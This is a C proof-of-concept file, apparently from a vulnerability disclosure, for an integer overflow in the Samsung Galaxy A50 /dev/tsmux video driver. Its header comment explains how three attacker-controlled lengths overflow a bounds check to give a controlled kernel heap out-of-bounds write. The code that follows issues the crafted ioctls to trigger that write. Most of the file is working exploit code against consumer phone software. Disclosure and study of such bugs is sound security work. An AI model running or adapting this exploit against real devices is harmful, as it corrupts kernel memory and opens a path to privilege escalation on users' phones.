/ ianbeer

#if 0
Samsung Galaxy A50 kernel heap out-of-bounds write due to integer overflow in tsmux_ioctl_m2m_run ioctl

/dev/tsmux is a character device for a video driver:

crw-rw----  1 media           graphics         10,  67 2019-10-22 14:14 tsmux

There's a controlled heap out-of-bounds write in the TSMUX_IOCTL_M2M_RUN ioctl:

    // pat_len, pmt_len and pcr_len are all attacker controlled signed 32-bit integers:

    if (ctx->psi_info.pat_len < 0 || ctx->psi_info.pmt_len < 0 || ctx->psi_info.pcr_len < 0)  // <-- (A)
        psi_validation = 0;
    psi_len = ctx->psi_info.pat_len + ctx->psi_info.pmt_len + ctx->psi_info.pcr_len;          // <-- (B)
    if (psi_len >= TSMUX_PSI_SIZE)                                                            // <-- (C)
        psi_validation = 0;

    if (m2m_job->pkt_ctrl.psi_en && psi_validation) {
        /* PAT CC should be set by tsmux device driver */
        psi_data = (char *)ctx->psi_info.psi_data;          // <-- (D)
        psi_data[3] |= ctx->rtp_ts_info.ts_pat_cc;

        ...

        psi_data += ctx->psi_info.pat_len;                  // <-- (E)

        /* PMT CC should be set by tsmux device driver */
        psi_data[3] |= ctx->rtp_ts_info.ts_pmt_cc;          // <-- (F)

At (A) the three attacker controlled signed integers are verified to be non-negative.

At (B) the three attacker controlled signed integers are added together and assigned to the signed integer variable psi_len.
This calculation can overflow, resulting in psi_len becoming negative.

At (C) psi_len is only validated to not be greater than TSMUX_PSI_SIZE. psi_len can however be negative at this point, and
a negative value would pass this check.

At (D) the uint8_t* psi_data is set to point to the psi_info.psi_data inline array inside the kernel heap allocated
struct tsmux_context.

At (E) the attacker-controlled pat_len integer is added to psi_data, allowing this pointer to be moved forwards up to two gigabytes.

At (F) an attacker controlled 32-bit value is OR'ed in to the value at the attacker-controlled offset.

Note that pcr_len is not actually used as a buffer offset here, so it can be set to a large value (eg INT_MAX (0x7fffffff)). With some
simple maths you can compute values for pat_len and pmt_len to write at an arbitrary offset from the heap allocation.
#endif

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/ioctl.h>

// SET_INFO

#define TSMUX_IOCTL_SET_INFO    \
  _IOW('T', 0x1, struct tsmux_psi_info)

#define TSMUX_PSI_SIZE      64
struct tsmux_psi_info {
  int32_t psi_data[TSMUX_PSI_SIZE];
  int32_t pcr_len;
  int32_t pmt_len;
  int32_t pat_len;
};

// SET_RTP

#define TSMUX_IOCTL_SET_RTP_TS_INFO   \
  _IOW('A', 0x20, struct tsmux_rtp_ts_info)

struct tsmux_rtp_ts_info {
  int32_t rtp_seq_number;
  int32_t rtp_seq_override;

  int32_t ts_pat_cc;
  int32_t ts_pmt_cc;

  int32_t ts_video_cc;
  int32_t ts_audio_cc;
};


// M2M_RUN

struct tsmux_pkt_ctrl {
  int32_t psi_en;
  int32_t rtp_size;
  int32_t rtp_seq_override;
  int32_t pes_stuffing_num;
  int32_t mode;
  int32_t id;
};

struct tsmux_pes_hdr {
  int32_t code;
  int32_t stream_id;
  int32_t pkt_len;
  int32_t marker;
  int32_t scramble;
  int32_t priority;
  int32_t alignment;
  int32_t copyright;
  int32_t original;
  int32_t flags;
  int32_t hdr_len;
  int32_t pts39_16;
  int32_t pts15_0;
};

struct tsmux_ts_hdr {
  int32_t sync;
  int32_t error;
  int32_t priority;
  int32_t pid;
  int32_t scramble;
  int32_t adapt_ctrl;
  int32_t continuity_counter;
};

struct tsmux_rtp_hdr {
  int32_t ver;
  int32_t pad;
  int32_t ext;
  int32_t csrc_cnt;
  int32_t marker;
  int32_t pl_type;
  int32_t seq;
  int32_t ssrc;
};

struct tsmux_swp_ctrl {
  int32_t swap_ctrl_out4;
  int32_t swap_ctrl_out1;
  int32_t swap_ctrl_in4;
  int32_t swap_ctrl_in1;
};

struct tsmux_hex_ctrl {
  int32_t m2m_enable;
  int32_t m2m_key[4];
  int32_t m2m_cnt[4];
  int32_t m2m_stream_cnt;
  int32_t otf_enable;
  int32_t otf_key[4];
  int32_t otf_cnt[4];
  int32_t otf_stream_cnt;
  int32_t dbg_ctrl_bypass;
};

struct tsmux_buffer {
  int32_t ion_buf_fd;
  int32_t buffer_size;
  int32_t offset;
  int32_t actual_size;
  int32_t es_size;
  int32_t state;
  int32_t job_done;
  int32_t partial_done;
  int64_t time_stamp;

  int64_t g2d_start_stamp;
  int64_t g2d_end_stamp;
  int64_t mfc_start_stamp;
  int64_t mfc_end_stamp;
  int64_t tsmux_start_stamp;
  int64_t tsmux_end_stamp;
  int64_t kernel_end_stamp;
};

struct tsmux_job {
  struct tsmux_pkt_ctrl pkt_ctrl;
  struct tsmux_pes_hdr pes_hdr;
  struct tsmux_ts_hdr ts_hdr;
  struct tsmux_rtp_hdr rtp_hdr;
  struct tsmux_swp_ctrl swp_ctrl;
  struct tsmux_hex_ctrl hex_ctrl;
  struct tsmux_buffer in_buf;
  struct tsmux_buffer out_buf;
};

#define TSMUX_MAX_M2M_CMD_QUEUE_NUM 3

#define TSMUX_IOCTL_M2M_RUN   \
  _IOWR('A', 0x12, struct tsmux_m2m_cmd_queue)

struct tsmux_m2m_cmd_queue {
  struct tsmux_job m2m_job[TSMUX_MAX_M2M_CMD_QUEUE_NUM];
};

void go() {
    // open /dev/tsmux
    int fd = open("/dev/tsmux", O_RDONLY);
    if (fd < 0) {
        printf("failed to open device node\n");
        return;
    }

    // TSMUX_IOCTL_SET_INFO
    struct tsmux_psi_info info = {0};

    info.pat_len = 0x40000000;
    info.pmt_len = 0x40000000;
    info.pcr_len = 0x40000000;

    int err;
    err = ioctl(fd, TSMUX_IOCTL_SET_INFO, &info);
    printf("ioctl returned %d\n", err);

    // set the value which will be written
    struct tsmux_rtp_ts_info rtp_info = {0};
    rtp_info.ts_pmt_cc = 0x41414141;
    err = ioctl(fd, TSMUX_IOCTL_SET_RTP_TS_INFO, &rtp_info);
    printf("ioctl returned %d\n", err);


    // TSMUX_IOCTL_M2M_RUN
    struct tsmux_m2m_cmd_queue queue = {0};
    queue.m2m_job[0].pkt_ctrl.psi_en = 1;

    err = ioctl(fd, TSMUX_IOCTL_M2M_RUN, &queue);
    printf("ioctl returned %d\n", err);

}

int main() {
    go();
    return 0;
}